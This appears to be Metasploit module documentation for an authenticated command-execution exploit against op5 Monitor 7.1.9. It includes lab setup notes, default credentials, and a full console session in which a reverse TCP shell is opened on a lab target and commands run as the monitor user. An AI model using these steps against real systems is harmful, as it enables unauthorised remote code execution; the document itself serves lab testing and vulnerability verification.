## Vulnerable Application

Official Source: [op5.com](https://www.op5.com/blog/wpfb-file/op5-monitor-7-1-9-20160303-tar-gz/)

Archived Copy: [github](https://github.com/h00die/MSF-Testing-Scripts)

### Creating A Testing Environment

Just a few quick notes on setting up a vulnerable lab with this software.

1. The vulnerable version only installs on CentOS 6.x (author used 6.0 final)
2. Within `php.ini`, change `date.timezone = "America/New York"` to `date.timezone = "America/New_York"` if you get PHP errors
3. You may need to register for a free license via an email challenge/verification

## Verification Steps

1. Install the software, RHEL/CentOS required (tested on CentOS 6)
2. Start msfconsole
3. Do: ```use exploit/linux/http/op5_config_exec```
4. Do: ```set payload linux/x86/shell/reverse_tcp```
5. Do: ```set rhost 192.168.2.31```
6. Do: ```set lhost 192.168.2.229```
7. Do: ```exploit```
8. You should get a shell.

## Options

### PASSWORD

Password is 'monitor' by default.

### USERNAME

Documentation was unclear on this. Installing just the app, the username was 'monitor' by default. However, it looks like if you install the appliance, it may be 'root'.

## Scenarios

```
msf > use exploit/linux/http/op5_config_exec
msf exploit(op5_config_exec) > set verbose true
verbose => true
msf exploit(op5_config_exec) > set payload linux/x86/shell/reverse_tcp
payload => linux/x86/shell/reverse_tcp
msf exploit(op5_config_exec) > set rhost 192.168.2.31
rhost => 192.168.2.31
msf exploit(op5_config_exec) > set lhost 192.168.2.229
lhost => 192.168.2.229
msf exploit(op5_config_exec) > check
[+] Version Detected: 7.1.9
[+] The target is vulnerable.
msf exploit(op5_config_exec) > exploit
[*] Started reverse TCP handler on 192.168.2.229:4444
[*] Sending stage (36 bytes) to 192.168.2.31
[*] Command shell session 1 opened (192.168.2.229:4444 -> 192.168.2.31:52552) at 2016-06-01 14:38:41 -0400
[*] Command Stager progress - 100.00% done (832/832 bytes)
whoami
monitor
id
uid=299(monitor) gid=48(apache) groups=48(apache),14(uucp),488(smstools) context=system_u:system_r:initrc_t:s0
```